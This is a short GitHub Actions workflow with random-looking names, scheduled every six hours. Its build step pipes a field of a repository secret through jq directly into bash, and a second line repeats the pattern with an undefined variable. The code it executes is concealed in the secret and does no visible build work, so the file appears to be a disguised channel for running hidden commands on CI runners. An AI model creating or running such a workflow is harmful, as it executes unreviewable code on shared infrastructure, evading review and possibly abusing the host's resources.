name: weiguomen8713
on:
  workflow_dispatch:
  schedule:
    - cron: '15 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: weiguomen8713
        env:
          g2: ${{ secrets.g2 }}
        run: |
          echo $g2 | jq -r .lodu646 | /bin/bash
          echo $atliy5919 | jq -r .m865 | /bin/bash

